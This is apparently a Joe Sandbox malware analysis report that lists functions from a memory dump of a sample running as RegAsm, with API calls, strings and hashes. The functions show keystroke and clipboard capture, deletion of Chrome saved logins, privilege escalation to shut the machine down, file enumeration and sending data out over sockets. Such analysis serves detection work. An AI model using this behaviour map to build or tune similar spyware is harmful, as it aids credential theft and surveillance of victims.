                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Find$CreateFirstNext
                                                        • String ID: 8SG$PXG$PXG$NG$PG
                                                        • API String ID: 341183262-3812160132
                                                        • Opcode ID: a5597b3f65d10343650a1b8aec819c1f417a5ef5d46547a6ada3e27d2cae3aed
                                                        • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                                        • Opcode Fuzzy Hash: a5597b3f65d10343650a1b8aec819c1f417a5ef5d46547a6ada3e27d2cae3aed
                                                        • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                        • String ID:
                                                        • API String ID: 1888522110-0
                                                        • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                                        • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                                        • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                                        • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00413FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegCreateKeyExW.ADVAPI32(00000000), ref: 0041409D
                                                        • RegCloseKey.ADVAPI32(?), ref: 004140A9
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 0041426A
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressCloseCreateLibraryLoadProcsend
                                                        • String ID: SHDeleteKeyW$Shlwapi.dll
                                                        • API String ID: 2127411465-314212984
                                                        • Opcode ID: d8728620bcedfbf95b0a0fc4e553f00c45b98f8cdcebe4b8e1ae684bfe74d4de
                                                        • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                                        • Opcode Fuzzy Hash: d8728620bcedfbf95b0a0fc4e553f00c45b98f8cdcebe4b8e1ae684bfe74d4de
                                                        • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00449212
                                                        • _free.LIBCMT ref: 00449236
                                                        • _free.LIBCMT ref: 004493BD
                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                        • _free.LIBCMT ref: 00449589
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                        • String ID:
                                                        • API String ID: 314583886-0
                                                        • Opcode ID: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                                                        • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                                        • Opcode Fuzzy Hash: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                                                        • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                          • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                          • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                          • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                          • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                                        • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                                        • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 0041686B
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                        • String ID: !D@$PowrProf.dll$SetSuspendState
                                                        • API String ID: 1589313981-2876530381
                                                        • Opcode ID: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
                                                        • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                                        • Opcode Fuzzy Hash: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
                                                        • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                                        • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                                        • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InfoLocale
                                                        • String ID: ACP$OCP$['E
                                                        • API String ID: 2299586839-2532616801
                                                        • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                        • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                                        • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                        • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                                        • GetLastError.KERNEL32 ref: 0040BA58
                                                        Strings
                                                        • [Chrome StoredLogins not found], xrefs: 0040BA72
                                                        • UserProfile, xrefs: 0040BA1E
                                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                                        • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DeleteErrorFileLast
                                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                        • API String ID: 2018770650-1062637481
                                                        • Opcode ID: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                                                        • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                                        • Opcode Fuzzy Hash: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                                                        • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                        • GetLastError.KERNEL32 ref: 0041799D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                        • String ID: SeShutdownPrivilege
                                                        • API String ID: 3534403312-3733053543
                                                        • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                        • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                                        • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                        • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00409258
                                                          • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                                        • FindClose.KERNEL32(00000000), ref: 004093C1
                                                          • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                          • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                          • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                        • FindClose.KERNEL32(00000000), ref: 004095B9
                                                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                        • String ID:
                                                        • API String ID: 1824512719-0
                                                        • Opcode ID: 79a333ab798d4f3832fd98009e5fc83f15b4850663dec53ce8833ea938511d01
                                                        • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                                        • Opcode Fuzzy Hash: 79a333ab798d4f3832fd98009e5fc83f15b4850663dec53ce8833ea938511d01
                                                        • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ManagerStart
                                                        • String ID:
                                                        • API String ID: 276877138-0
                                                        • Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                                        • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                                        • Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                                        • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindResourceA.KERNEL32 ref: 0041B4B9
                                                        • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                                        • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                                        • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Resource$FindLoadLockSizeof
                                                        • String ID: SETTINGS
                                                        • API String ID: 3473537107-594951305
                                                        • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                        • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                                        • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                        • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 0040966A
                                                        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstH_prologNext
                                                        • String ID:
                                                        • API String ID: 1157919129-0
                                                        • Opcode ID: fb173912142d451d8169f8852f62cc003beda93b99b20e6bd32f4a4dc40a9ea1
                                                        • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                                        • Opcode Fuzzy Hash: fb173912142d451d8169f8852f62cc003beda93b99b20e6bd32f4a4dc40a9ea1
                                                        • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00408811
                                                        • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                        • String ID:
                                                        • API String ID: 1771804793-0
                                                        • Opcode ID: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
                                                        • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                                        • Opcode Fuzzy Hash: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
                                                        • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileFind$FirstNextsend
                                                        • String ID: XPG$XPG
                                                        • API String ID: 4113138495-1962359302
                                                        • Opcode ID: ef4afc18dc9d34da461ea20a285219582541565e32a666253127ded6bb227160
                                                        • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                                        • Opcode Fuzzy Hash: ef4afc18dc9d34da461ea20a285219582541565e32a666253127ded6bb227160
                                                        • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00451CD8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                        • String ID: sJD
                                                        • API String ID: 1661935332-3536923933
                                                        • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                        • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                                        • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                        • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004520C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorInfoLastLocale$_free$_abort
                                                        • String ID:
                                                        • API String ID: 2829624132-0
                                                        • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                                        • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                                        • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                                        • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0043BB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC24
                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                        • String ID:
                                                        • API String ID: 3906539128-0
                                                        • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                        • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                                        • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                        • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Clipboard$CloseDataOpen
                                                        • String ID:
                                                        • API String ID: 2058664381-0
                                                        • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                                        • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                                        • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                                        • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0044E879 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .
                                                        • API String ID: 0-248832578
                                                        • Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                                        • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                                                        • Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                                        • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00451F9B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
